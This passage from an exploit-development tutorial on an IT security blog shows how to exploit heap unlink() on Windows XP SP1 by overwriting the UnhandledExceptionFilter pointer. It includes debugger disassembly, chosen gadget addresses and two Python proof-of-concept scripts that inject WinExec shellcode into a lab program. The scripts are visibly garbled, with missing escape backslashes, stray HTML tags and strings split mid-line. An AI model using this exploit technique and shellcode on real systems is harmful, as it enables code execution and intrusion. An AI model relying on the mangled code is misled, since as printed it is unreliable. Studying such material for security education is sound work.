Olly or Immunity Debugger so that our Exception Filter is called and offsets are at the
correct location. Ok so first of all, we must find where we are going to write our dword
too. This would be the pointer to Unhandled Exception Filter. This can be found by
going looking at the code at SetUnhandledExceptionFilter().
It can be see that a MOV instruction uses a pointer to UnhandledExceptionFilter
(0x77ed73b4):
mr_me's IT security blog - 9 / 12 - 10.01.2011
10. 10
So at this point, we can saftley say that ECX will contain the value 0x77c3bbad. But
now what are we going to write? lets take a look at what happens when the
UnhandledExceptionFilter is called:
77E93114 A1 B473ED77 MOV EAX,DWORD PTR DS:[77ED73B4]
77E93119 3BC6 CMP EAX,ESI
77E9311B 74 15 JE SHORT kernel32.77E93132
77E9311D 57 PUSH EDI
77E9311E FFD0 CALL EAX
Basically, the pointer to UnhandledExceptionFilter() is parsed into EAX and a push
EDI, then call EAX executes. Similar to Vectored Exception Handling (except the
complete opposite ), we can overwrite the pointers value. This pointer will then
point to our shellcode, or an instruction that will get us back to our shellcode.
If we take a look at EDI, we will notice a pointer after 0×78 bytes to the bottom of our
payload (8 bytes off the bottom of our payload).
So if we simply call this pointer, we will be executing our shellcode. Therefore we
need an instruction in EAX such as:
call dword ptr ds:[edi+74]
This instruction is easily found in many MS modules under XP sp1.
So then lets fill in these values into our PoC and see where we land:
<br />
import os<br />
mr_me's IT security blog - 10 / 12 - 10.01.2011
11. 11
exploit = ("xcc" * 272)<br />
exploit += ("xadxbbxc3x77") # ECX 0x77C3BBAD --> cal
l dword ptr ds:[EDI+74]<br />
exploit += ("xb4x73xedx77") # EAX 0x77ED73B4 --> Unh
andledExceptionFilter()<br />
exploit += ("xcc" * 272)<br />
os.system('"C:Documents and SettingsSteveDesktopodbg110
OLLYDBG.EXE" heap-uef.exe ' + exploit)<br />
Of course we simply calculate the offset to this part of the shellcode and insert our
JMP instruction code and insert our shellcode:
<br />
import os</p>
<p>calc = ("x33xC0x50x68x63x61x6Cx63x54x5Bx50x53xB9
"<br />
"x44x80xc2x77" # address to WinExec()<br />
"xFFxD1x90x90")</p>
<p>exploit = ("x44" * 264)<br />
exploit += "xebx14" # our JMP (over the junk and into nop
s)<br />
exploit += ("x44" * 6)<br />
exploit += ("xadxbbxc3x77") # ECX 0x77C3BBAD --> cal
l dword ptr ds:[EDI+74]<br />
exploit += ("xb4x73xedx77") # EAX 0x77ED73B4 --> Unh
andledExceptionFilter()<br />
exploit += ("x90" * 21)<br />
exploit += calc</p>
<p>os.system('heap-uef.exe ' + exploit)<br />
Boom !
mr_me's IT security blog - 11 / 12 - 10.01.2011
12. 12
Conclusion:
We have demonstrated two techniques for exploiting unlink() in its most primitive
form under windows XP sp1. Other techniques can also apply such as
RtlEnterCriticalSection or TEB Exception Handler exploitation in the same situation.
Following on from here we will present exploiting Unlink() (HeapAlloc/HeapFree)
under Windows XP sp2 and 3 and bypass windows protections against the heap.
PoC’s:
http://www.exploit-db.com/exploits/12240/q
http://www.exploit-db.com/exploits/15957/q
References:
The shellcoder’s handbook (Chris Anley, John Heasman, FX, Gerardo Richarte)1.
David Litchfield2.
(http://www.blackhat.com/presentations/win-usa-04/bh-win-04-litchfield/bh-win-04-litchf
ield.ppt)
This entry was posted on Sunday, October 24th, 2010 at 2:30 pm and is filed under
exploit development
You can follow any responses to this entry through the Comments (RSS) feed. You can
leave a response, or trackback from your own site.
mr_me's IT security blog - 12 / 12 - 10.01.2011